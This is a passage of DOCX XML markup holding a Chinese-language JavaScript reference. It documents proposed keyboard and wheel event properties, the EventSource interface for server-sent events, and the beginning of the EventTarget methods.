    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly unsigned long </w:t>
      </w:r>
      <w:r>
        <w:t>deltaMode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>适用于滚轮事件，这个属性定义</w:t>
      </w:r>
      <w:r>
        <w:t>deltaX</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>deltaY</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>deltaZ</w:t>
      </w:r>
      <w:r>
        <w:t>属性的合适的转换值。这个属性的值可能为下面的常量之一：</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_DELTA_PIXEL</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_DELTA_LINE</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_DELTA_PAGE</w:t>
      </w:r>
      <w:r>
        <w:t>。这个属性的值是与平台相关的，它可能取决于系统偏好或者滚轮事件时按下的辅助键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long deltaX,deltaY,deltaZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于滚轮事件，这些属性定义滚轮围绕这三条可能的轴分别旋转了多少。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long inputMe</w:t>
      </w:r>
      <w:r>
        <w:t>thod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这个属性指明文本被输入的方式。属性值可能为下面的常量之一：</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_INPUT_METHOD_UNKNOWN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>OM_INPUT_METHOD_KEYBOARD</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_INPUT_METHOD_PASTE</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_INPUT_METHOD_DROP</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_INPUT_METHOD_IME</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_INPUT_METHOD_OPTION</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_INPUT_METHOD_HANDWRITING</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_INPUT_METHOD_VOICE</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_INPUT_METHO</w:t>
      </w:r>
      <w:r>
        <w:t>D_MULTIMODAL</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_INPUT_METHOD_SCRIPT</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对生成字符的键盘事件来说，这个属性的值与</w:t>
      </w:r>
      <w:r>
        <w:t>cha r</w:t>
      </w:r>
      <w:r>
        <w:t>的值一样。如果键盘事件没有生成字符，这个属性将保存按下的键的名字（如</w:t>
      </w:r>
      <w:r>
        <w:t>"Tab"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"Down"</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string locale</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于键盘事件和</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这个属性指明一个标识键盘配置的区域的语言代码（例如</w:t>
      </w:r>
      <w:r>
        <w:t>"en-GB"</w:t>
      </w:r>
      <w:r>
        <w:t>），如果该信息已知的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long location</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于键</w:t>
      </w:r>
      <w:r>
        <w:t>盘事件，这个属性指明按下的键的键盘位置。属性的值可能是下面的常量之一：</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_KEY_LOCATION_STANDARD</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_KEY_LOCATION_LEFT</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_KEY_LOCATION_RIGHT</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_KEY_LOCATION_NUMPAD</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_KEY_LOCATION_MOBILE</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM_KEY_LOCATION_JOYSTICK</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean repeat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于键盘事件，如果一个键按下足够长的时间，触发了重复事件，则这个属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提议方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>上面列出的提议属性，这儿列出的方法已经在标准的草案中有了提议，但还没有被任何浏览器实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>boolean getModiferState(string modifer)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于鼠标和键盘事件，如果事件发生时指定的辅助键按下，则这个方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>modifier</w:t>
      </w:r>
      <w:r>
        <w:t>可能是下面的字符串之一：</w:t>
      </w:r>
      <w:r>
        <w:t>"Alt"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"AltGraph"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"CapsLock"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Control"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Fn"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Meta"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"NumLock"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Scroll"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Shift"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"SymbolLock"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"Win"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="818" w:name="EventSource"/>
      <w:r>
        <w:t>Even</w:t>
      </w:r>
      <w:r>
        <w:t>tSource</w:t>
      </w:r>
      <w:bookmarkEnd w:id="818"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>到一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的长连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>表示一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>长连接，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器可以通过这个连接</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>推送</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>文本消息。要使用这些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>服务器发送的事件</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，可以将服务器的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>传给</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，然后在生成的</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>对象上注册一个消息事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>服务器发送的事件是新添加的，在编写本书时，还没有浏览器支持。</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EventSource(string url)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>创建一个连接到指定</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的新</w:t>
      </w:r>
      <w:r>
        <w:t>EventSou</w:t>
      </w:r>
      <w:r>
        <w:t>rce</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>为相对于当前文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的常量定义了</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short CONNECTING=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>连接正在建立中，或者连接已关闭并且</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>正在重新连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short OPEN=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>连接已打开，正在分发事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short CLOSED=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>连接已关闭，原因是调用了</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，或者发生了重大错误不可能重新连接。</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short readyState</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>连接的状态。上面的常量定义了所有可能的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly string url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>连接到的绝对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</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void close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将关闭连接。一旦调用这个方法，</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>对象就不再可以使用。如果要再次连接，只能创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>。</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网络通信是异步的，所以当连接打开、发生错误以及有消息从服务器到达时</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>会触发事件。可以在这儿列出的属性上注册事件处理程序，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来代替。</w:t>
      </w:r>
      <w:r>
        <w:t>EventS</w:t>
      </w:r>
      <w:r>
        <w:t>ource</w:t>
      </w:r>
      <w:r>
        <w:t>事件都分派在</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>对象自身之上，不会冒泡，也没有可以取消的默认行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>发生错误时触发。关联的事件对象是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当有消息从服务器到达时触发。关联的事件对象是一个</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>，通过这个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以取得服务器的消息的文本内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onopen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当连接打开时触发。关联的事件对象是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="819" w:name="EventTarget"/>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:bookmarkEnd w:id="819"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>接收事件的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有事件在其上触发的对象或者事件冒泡到的对象，需要一种方式来为这些事件定义处理程序。这些对象定义的事件处理程序的注册属性名一般以</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>开头，通常它们也定义这儿描述的方法。事件处理程序注册是一个惊人复杂的话题，细节可参见</w:t>
      </w:r>
      <w:r>
        <w:t>17.2</w:t>
      </w:r>
      <w:r>
        <w:t>节，特别要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本使用的是和所有其他浏览器者不同的方法，在接下来的专门一节里有介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void addEventListener(string type,function listener,[boolean useCapture])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法将指定的</w:t>
      </w:r>
      <w:r>
        <w:t>listener</w:t>
      </w:r>
      <w:r>
        <w:t>函数注册为类型为</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件的事件处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>是一个事件名称字符串，不包含</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>前缀。如果这是一个注册在真实事件目标的文档祖先上的捕获事件处理程序（参见</w:t>
      </w:r>
      <w:r>
        <w:t>17.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节），参数</w:t>
      </w:r>
      <w:r>
        <w:t>useCapture</w:t>
      </w:r>
      <w:r>
        <w:t>的值应该为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，有些浏览器还要求传入第三个参数到这个函数中，要注册普通的非捕获处理程序只能传入</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean dispatchEvent(Event event)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法分发一个合成</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>到当前事件目标上。通过</w:t>
      </w:r>
      <w:r>
        <w:t>document.createEve</w:t>
      </w:r>
      <w:r>
        <w:t>nt()</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象，传入事件名（比如对简单事件来说传入</w:t>
      </w:r>
      <w:r>
        <w:t>"event"</w:t>
      </w:r>
      <w:r>
        <w:t>）。接下来，为创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象调用事件初始化方法：对简单事件而言，这个方法是</w:t>
      </w:r>
      <w:r>
        <w:t>initEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>）。接下来，将初始化后的事件传入这个方法来分发它。在现代浏览器中，每一个</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象都有一个</w:t>
      </w:r>
      <w:r>
        <w:t>isTrusted</w:t>
      </w:r>
      <w:r>
        <w:t>属性，由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>分发的任何合成事件的这个属性都将是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每一种事件对象都定义一个特定于类型的初始化方法。这些方法不经常用到，有长长的繁琐的参数列表，本书没有相关文档。如果需要创建</w:t>
      </w:r>
      <w:r>
        <w:t>、初始化然后分发比基本</w:t>
      </w:r>
      <w:r>
